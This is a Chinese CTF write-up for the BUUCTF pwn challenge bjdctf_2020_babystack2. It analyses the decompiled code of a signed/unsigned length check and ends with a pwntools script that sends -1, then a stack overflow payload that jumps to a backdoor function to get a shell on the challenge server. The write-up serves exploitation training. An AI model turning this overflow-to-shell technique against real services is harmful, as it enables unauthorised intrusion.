BUU刷题bjdctf_2020_babystack2

解题所需知识：
[[无符号整数溢出漏洞]]
[[1.基本ROP]]

题目信息：

┌──(kali㉿kali)-[~/Desktop]
└─$ file bjdctf_2020_babystack2
bjdctf_2020_babystack2: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=98383c4b37ec43aae16b46971bd5ead3f03ce0a6, not stripped
                                                                                                    
┌──(kali㉿kali)-[~/Desktop]
└─$ checksec --file=bjdctf_2020_babystack2
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      Symbols    FORTIFY  Fortified       Fortifiable     FILE
Partial RELRO   No canary found   NX enabled    No PIE          No RPATH   No RUNPATH   75) Symbols  No     0               1               bjdctf_2020_babystack2

操作位数：64位
保护机制：

逻辑分析：
伪代码：

__int64 backdoor()
{
  system("/bin/sh");
  return 1LL;
}

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char buf[12]; // [rsp+0h] [rbp-10h] BYREF
  size_t nbytes; // [rsp+Ch] [rbp-4h] BYREF

  setvbuf(_bss_start, 0LL, 2, 0LL);
  setvbuf(stdin, 0LL, 1, 0LL);
  LODWORD(nbytes) = 0;
  puts("**********************************");
  puts("*     Welcome to the BJDCTF!     *");
  puts("* And Welcome to the bin world!  *");
  puts("*  Let's try to pwn the world!   *");
  puts("* Please told me u answer loudly!*");
  puts("[+]Are u ready?");
  puts("[+]Please input the length of your name:");
  __isoc99_scanf("%d", &nbytes);
  if ( (int)nbytes > 10 )
  {
    puts("Oops,u name is too long!");
    exit(-1);
  }
  puts("[+]What's u name?");
  read(0, buf, (unsigned int)nbytes);
  return 0;
}

分析：
比较nbytes和10的大小，可以利用符号溢出漏洞，输入一个负数，进而输入name的时候可以实现栈溢出跳转到后门函数getshell
nbytes是signed int类型，4字节，但后面read函数输入name时却是unsigned int类型
因此可以输入0x80000001=>2147483649，signed int类型被当做负数小于10，read函数中unsigned int类型被当成正整数2147483649

脚本：

from pwn import *
context(log_level='debug',arch='amd64',os='linux')

pwnfile='./bjdctf_2020_babystack2'
sh=remote('node4.buuoj.cn',26524)
#sh=process(pwnfile)

backdoor_addr=0x400726

sh.recvuntil("your name:\n")
sh.sendline(b'-1')

sh.recvuntil("name?\n")
payload1=0x18*b'a'+p64(backdoor_addr)
print(payload1)

#gdb.attach(sh)
#pause()

sh.sendline(payload1) 

sh.interactive()